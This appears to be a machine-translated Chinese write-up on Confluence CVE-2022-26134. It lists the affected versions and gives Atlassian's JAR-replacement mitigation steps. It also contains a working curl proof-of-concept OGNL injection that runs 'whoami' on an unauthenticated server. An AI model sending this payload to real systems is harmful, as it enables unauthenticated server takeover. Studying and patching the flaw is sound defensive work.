disclaimer ：

This article is only for study and research , It is strictly forbidden to use the content of this article to illegally operate other Internet applications , If it is used for illegal purposes , The consequences will be borne by you , All risks arising are not related to the author of this article , If you continue to read this article, you will follow this content by default .

Atlassian Confluence Remote code execution vulnerability （CVE-2022-26134） Loophole recurrence

Summary of vulnerability ：

CVE-2022-26134 Is a serious unauthenticated Remote Code Execution Vulnerability , adopt OGNL Inject, utilize, and influence 1.3.0 All after version Atlassian Confluence and Data Center 2016 The server . Successful exploitation allows unauthenticated remote attackers to create new administrator accounts 、 Execute the command and eventually take over the server .

Affects version ：

• 1.3.0 <= Confluence Server and Data Center < 7.4.17

• 7.13.0 <= Confluence Server and Data Center < 7.13.7

• 7.14.0 <= Confluence Server and Data Center < 7.14.3

• 7.15.0 <= Confluence Server and Data Center < 7.15.2

• 7.16.0 <= Confluence Server and Data Center < 7.16.4

• 7.17.0 <= Confluence Server and Data Center < 7.17.4

• 7.18.0 <= Confluence Server and Data Center < 7.18.1

Loophole recurrence ：

utilize POC：

This command is executed whoami And store it in X-Cmd-Response HTTP In the head .

curl -v http://10.10.1.105:8090/%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Cmd-Response%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20d%3D%27%27%3Bvar%20i%20%3D%20java.lang.Runtime.getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%3B%20while%28i.available%28%29%29d%2B%3DString.fromCharCode%28i.read%28%29%29%3Bd%22%29%29%7D/

Use process ：

Repair suggestions ：

about Confluence 7.15.0 - 7.18.0
If you are running in a cluster Confluence, You need to repeat this process on each node . You can apply this mitigation without shutting down the entire cluster .

1. Shut down Confluence.

2. Add the following 1 Files downloaded to Confluence The server ：
   xwork-1.0.3-atlassian-10.jar

3. Delete （ Or the following JAR Removed from the Confluence The installation directory ）：
   <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3-atlassian-8.jar

4. Will download xwork-1.0.3-atlassian-10.jar Copied to the <confluence-install>/confluence/WEB-INF/lib/

5. Check for new xwork-1.0.3-atlassian-10.jar Whether the permissions and ownership of the files match the existing files in the same directory .

6. Start Confluence.

about Confluence 7.0.0 - Confluence 7.14.2

1. Shut down Confluence.
2. Add the following 3 Files downloaded to Confluence The server ：
   xwork-1.0.3-atlassian-10.jar
   webwork-2.1.5-atlassian-4.jar
   CachedConfigurationProvider.class
3. Delete （ Or the following JAR Move to Confluence Outside the installation directory ）：
   <confluence-install>/confluence/WEB-INF/lib/xwork-1.0.3.6.jar
<confluence-install>/confluence/WEB-INF/lib/webwork-2.1.5-atlassian-3.jar
   Don't leave old in the catalog JAR Copy of .
4. Will download xwork-1.0.3-atlassian-10.jar Copied to the /confluence/WEB-INF/lib/
5. Will download webwork-2.1.5-atlassian-4.jar Copied to the /confluence/WEB-INF/lib/
6. Check that the permissions and ownership of the two new files match the existing files in the same directory .
7. Switch to directory /confluence/WEB-INF/classes/com/atlassian/confluence/setup
   1. Create a new directory named webwork
   2. take CachedConfigurationProvider.class Copied to the /confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
   3. Ensure that permissions and ownership are correct ：
   <confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork
<confluence-install>/confluence/WEB-INF/classes/com/atlassian/confluence/setup/webwork/CachedConfigurationProvider.class
8. Start Confluence.

Reference resources

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
https://mp.weixin.qq.com/s/tCvvvGUO4XfV8TnOrPkTcg
https://gist.github.com/jbaines-r7/a95ab29995eba3306169e755d8b3e92c